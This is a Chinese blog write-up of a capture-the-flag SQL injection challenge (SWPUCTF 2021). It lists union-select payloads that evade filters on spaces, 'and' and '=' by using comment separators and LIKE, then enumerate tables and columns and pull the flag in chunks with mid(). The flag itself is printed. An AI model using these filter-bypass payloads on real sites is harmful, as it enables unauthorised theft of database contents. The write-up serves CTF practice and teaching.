SQL注入(入门其二——过滤)

最新推荐文章于 2023-12-27 09:44:09 发布
最新推荐文章于 2023-12-27 09:44:09 发布
阅读量1.2k 收藏 3
点赞数 1
分类专栏: CTF # sql注入 文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43520778/article/details/132723572
版权

@[toc]SQL注入

概要[SWPUCTF 2021 新生赛]sql

提示:
(1)# 和 --+表示注释,在url中,get请求解释执行时,#号是指导浏览器动作,对服务器端无效,HTTP请求中将不包括#,故使用#闭合无法注释,会报错;此外,使用-- (有个空格)注释时,在传输过程中空格会被忽略,造成无法注释,因此,在get请求传参注入时使用--+的方式来闭合,因为+会被解释成空格。

(2)可以使用--%20,把空格转换为urlencode编码格式,把#变成%23,不报错

(3)post请求,则可以直接使用#来进行闭合

题目

在这里插入图片描述
查看源码发现参数为wllm

解题思路

测试

?wllm=1           -- 正常
?wllm=1'          -- 报错
?wllm=1'--+      -- 请勿非法操作!
?wllm=1'#         -- 请勿非法操作!

存在过滤

?wllm=1'%23       --正常
?wllm=1'and 1%23    -- 请勿非法操作!
?wllm=1'and/**/1%23    -- 请勿非法操作!
?wllm=1'or 1%23      -- 请勿非法操作!
?wllm=1'or/**/1%23    -- 正常
?wllm=1'or/**/1=1%23   -- 请勿非法操作!

判断 (空格)、and和=(等号)被过滤了
提示:
绕过空格(注释符/**/)
绕过=(like)

解题过程

判断字段

?wllm=1'order/**/by/**/3%23     -- 正常
?wllm=1'order/**/by/**/4%23     -- 错误

字段长度为3

查看回显点

?wllm=-1'union/**/select/**/1,2,3%23

在这里插入图片描述

查寻库名

?wllm=-1'union/**/select/**/1,2,database()%23

在这里插入图片描述
查询表名

?wllm=-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/informa
tion_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23


查询字段名

?wllm=-1'union/**/select/**/1,2,group_concat(column_name)/**/from/**/inform
ation_schema.columns/**/where/**/table_schema/**/like/**/'test_db'%23

在这里插入图片描述

查询flag表里面内容

?wllm=-1'union/**/select/**/1,2,group_concat(flag)/**/from/**/test_db.LTLT_flag%23

在这里插入图片描述
因为可显示长度位数不足导致未完全显示,故可使用使用截断函数substr,right,REVERSE,mid绕过
经测试substr,right,REVERSE 被过滤,只能用mid
mid截取,因为回显只能有20个,所以20,一组截取

第一组

?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),1,20)/**/from/**/tes
t_db.LTLT_flag%23

NSSCTF{a3524c07-b7aa

第二组

?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),21,20)/**/from/**/tes
t_db.LTLT_flag%23

-4684-a421-14ae1244
第三组

?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),41,20)/**/from/**/tes
t_db.LTLT_flag%23

1191}
最后拼接flag

NSSCTF{a3524c07-b7aa-4684-a421-14ae12441191}
L'amour d'une vie
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
5种方法防止 jsp被sql注入
收集盒 Book box
09-22 6443
一、 SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。 ===========================================
推荐几个Java项目防止SQL注入的方法
Javaの甘乃迪的博客
10-06 668
Java项目防止SQL注入的几种方案
SQL注入一些过滤及绕过总结
最新发布
2301_76786857的博客
12-27 893
过滤关键字应该是最常见的过滤了,因为只要把关键字一过滤,你的注入语句基本就不起作用了。(3)既然是过滤关键字,大小写应该都会被匹配过滤,所以大小写绕过一般是行不通的。常见的几种注入方法基本上都要使用逗号,要是逗号被过滤了,那就只能想办法绕过了。(2)对于盲注的那几个函数substr(),mid(),limit。(1)最常用的绕过方法就是用/**/,,分割关键字。(2)根据过滤程度,有时候还可以用双写绕过。(1)简单注入可以使用join方法绕过。(4)有时候还可以使用编码绕过。
防止SQL注入攻击的10种有效方法
热门推荐
qq_28245087的博客
06-29 3万+
本文介绍了10种防止SQL注入攻击的方法,包括使用参数化查询、输入验证和过滤、存储过程、最小权限原则、ORM框架、准备语句、安全的数据库连接、避免动态拼接SQL语句、使用防火墙和入侵检测系统以及定期更新和维护数据库软件。输入验证和过滤是一种用于确保用户输入数据的安全性和有效性的技术。需要注意的是,具体的代码实现可能因使用的数据库驱动库而有所不同,但核心思想是相同的:使用PreparedStatement来执行参数化查询,将用户输入作为参数传递给查询,而不是直接拼接到查询字符串中,以提高应用程序的安全性。
sql注入问题后端字符过滤
weixin_39693899的博客
12-29 482
sql注入问题
结合jquery的前后端加密解密 适用于WebApi的SQL注入过滤器 Web.config中customErrors异常信息配置 ife2018 零基础学院 day 4 ife2018 零基...
07-18 358
在一个正常的项目中,登录注册的密码是密文传输到后台服务端的,也就是说,首先前端js对密码做处理,随后再传递到服务端,服务端解密再加密传出到数据库里面。Dotnet已经提供了RSA算法的加解密类库,我们只需要引用下就好,前端js也有对RSA算法的封装,解决了加解密算法之后,剩下的就是要确保公私钥的传输了,前端使用公钥加密,服务端使用私钥解密,如此才能成功,要不然会出问题。同时,在前端,我们...
SQL注入漏洞全接触——高级篇.txt
02-13
看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。 1.有些人会过滤...
SQLServer2014从入门到精通随书数据库及案例代码
03-28
此外,了解SQL注入和防护措施也是保护数据库免受攻击的重要知识。 最后,SQL Server 2014还提供了高级功能,如分析服务(SSAS)、报告服务(SSRS)和集成服务(SSIS),这些工具支持数据仓库构建、商业智能报表制作...
JavaWeb开发教程——入门与提高篇(含PDF课件和源码)
07-26
本教程"JavaWeb开发教程——入门与提高篇"旨在为初学者提供一个全面的学习路径,同时也为有一定基础的开发者提供进阶知识。教程包含了PDF课件和源码,使学习者能够理论结合实践,更深入地理解JavaWeb开发的核心概念...
php-——新手入门资料。
04-08
12. **安全性**:PHP开发者应掌握防止SQL注入、XSS攻击、CSRF攻击等安全措施,如使用预编译语句、过滤用户输入、设置安全的cookie选项等。 通过学习以上知识点,新手可以逐步掌握PHP编程,进而利用PHP开发出功能...
程序员的SQL金典4-8
05-20
 10.1.1 SQL注入漏洞原理  10.1.2 过滤敏感字符  10.1.3 使用参数化SQL  10.2 SQL调优  10.2.1 SQL调优的基本原则  10.2.2 索引  10.2.3 全表扫描和索引查找  10.2.4 优化手法  10.3 事务  10.3.1 事务...
sql注入过滤select_网站SQL注入渗透测试手法介绍
weixin_39628384的博客
11-26 1958
国庆即将到来,前一期讲到获取网站信息判断所属环境以及各个端口的用处和弱口令密码利用方法,这期仍有很多客户找到我们想要了解针对于SQL注入攻击的测试方法,这一期我们来讲解下注入的攻击分类和使用手法,让客户明白漏洞是如何产生的,会给网站安全带来怎样的影响!3.1 SQL注入漏洞3.1.1. 注入分类SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序。在应用程序中,如果没有做恰当的过滤,则可能使得...
SQL注入绕过关键词过滤的小技巧及原理(union select为例)
weixin_54848371的博客
09-22 1万+
本文以联合查询关键字union select为例讲解绕过关键词过滤的一些方法。之所以了解绕过,关键是发现sqlmap有时候真的是不靠谱,只能指定命令跑。有一些简单过滤很容易绕过却不能检测。虽然麻烦点,手工yyds~~。 1、大小写变种 UNION SELECT=>uNIon SElecT 选择几个字母变换大小写,可以绕过部分不太聪明的过滤器。在sql查询中是不区分大小写的所以查询语句正常执行 2、使用SQL注释 union select=>/**/UNION/**/...
SQL注入防护
暖风吹起云之博客
08-04 3029
SQL注入介绍和防护。
sql注入过滤
wzx_it的专栏
12-20 525
///     /// Sql过滤器     ///     public class SqlCleaner     {         private static List injectWords = new List();         ///         /// 静态构造函数         ///         static SqlCleaner()
sql注入过滤关键字(union select等等)
没事我溜达
03-15 8455
今天来学习一下注入中关键字被过滤了该如何解决 打开靶场,这是我本地搭建的一个靶场所以没有靶场地址 我们在输入框内输入一个1 查询一下结果。 尝试闭合和注释,发现单引号即可完成闭合,--+作为注释内容,通过order by查询列数 看到页面上方order的or被过滤,说明or即是关键词,我们双写or,变成 oorrder by 2 (一定要在or的中间双写or,不然两个都会被注释掉) 通过order by发现只有两列数据,那么开始联合注入 ...
ctf sql注入关键词绕过【积累中】
Sp4rkW的博客
09-25 2万+
写在前面:这个博客知识点来源于个人ctf练习比赛中积累的知识点及网络中各个博客的总结点,这里做测试和记录 0x00 sql注入理解 SQL注入能使攻击者绕过认证机制,完全控制远程服务器上的数据库SQL是结构化查询语言的简称,它是访问数据库的事实标准。目前,大多数Web应用都使用SQL数据库来存放应用程序的数据。几乎所有的Web应用在后台 都使用某种SQL数据库。跟大多数语言一...
代码审计 | SQL注入过滤器绕过
hackzkaq的博客
11-06 203
FILTER_VALIDATE_EMAIL过滤器不允许在邮件地址中出现空格符号,可以使用/**/来代替。在进行数据库操作时,需要使用PDO预处理的方式,防止SQL注入漏洞的产生。在示例代码中,用户输入的参数被直接用于执行SQL查询操作,这种方式存在潜在的安全风险。尽管代码中使用了过滤器进行过滤,但这种方式依然不足以防止攻击者绕过过滤器,从而导致SQL注入漏洞。RFC不是非常严格,允许使用许多特殊字符。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
渗透学习入门SQL注入
07-31
渗透学习入门SQL注入

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值